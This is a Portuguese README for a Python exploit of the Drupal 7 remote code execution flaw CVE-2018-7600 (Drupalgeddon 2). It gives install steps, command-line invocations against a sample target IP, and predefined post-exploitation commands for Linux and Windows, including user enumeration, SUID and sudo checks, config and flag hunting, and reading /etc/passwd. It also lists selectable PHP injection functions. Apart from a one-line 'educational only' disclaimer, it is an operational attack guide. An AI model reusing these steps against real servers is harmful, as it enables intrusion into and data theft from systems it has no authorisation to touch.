
Exploit em Python para CVE-2018-7600 (Drupalgeddon 2) que permite execução remota de código no Drupal 7 com múltiplos métodos de injeção e comandos predefinidos para Linux e Windows.
bixi.pybixi.py é um exploit para a vulnerabilidade CVE‑2018‑7600 (Drupalgeddon 2) que afeta Drupal 7.
Permite a execução remota de comandos (RCE) em servidores Drupal vulneráveis através de uma interface intuitiva e comandos predefinidos.
ESTE SOFTWARE É APENAS PARA FINS EDUCATIVOS E DE PESQUISA EM AMBIENTES CONTROLADOS.
"Com grandes poderes vêm grandes responsabilidades"
system, passthru, exec, shell_exec)git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600
# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests
# Outras distribuições
pip3 install requests
chmod +x bixi.py
python3 bixi.py --help
python3 bixi.py <URL> <COMANDO/PALAVRA_CHAVE> [TIPO_INJEÇÃO]
# Verificar vulnerabilidade
python3 bixi.py http://10.99.99.6/drupal/ test
# Detectar sistema operacional
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows
# Enumerar usuários
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user
# Informação do sistema
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig
# Comandos personalizados
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
| Comando | Descrição |
|---|---|
| linux | Informação do sistema |
| users_linux | Listar usuários |
| id | Info de usuário/grupos |
| ls | Listar arquivos |
| ifconfig | Info de rede |
| find_flag | Buscar flags |
| Comando | Descrição |
|---|---|
| windows | Informação do sistema |
| net_user | Listar usuários |
| whoami_win | Info detalhada |
| ipconfig | Rede |
| netstat_win | Conexões |
| dir | Listar diretório |
| Comando | Descrição |
|---|---|
| sudo | Verificar privilégios sudo |
| suid | Buscar binários SUID |
| net_localgroup | Grupos locais |
| drupal_config | Buscar configurações |
| drupal_version | Obter versão do Drupal |
# system (default)
python3 bixi.py http://target/ "whoami" system
# passthru
python3 bixi.py http://target/ "whoami" passthru
# exec
python3 bixi.py http://target/ "whoami" exec
# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec
drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│ ├── linux_commands.txt
│ └── windows_commands.txt
└── screenshots/
├── help_screen.png
└── exploit_success.png
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
Modificar valor por defecto (15 segundos):
timeout=15
Editar o dicionário commands em get_command_for_keyword()
pip3 install requests
# Verificar conectividade
ping TARGET_IP
# Verificar rota Drupal
curl http://TARGET_IP/drupal/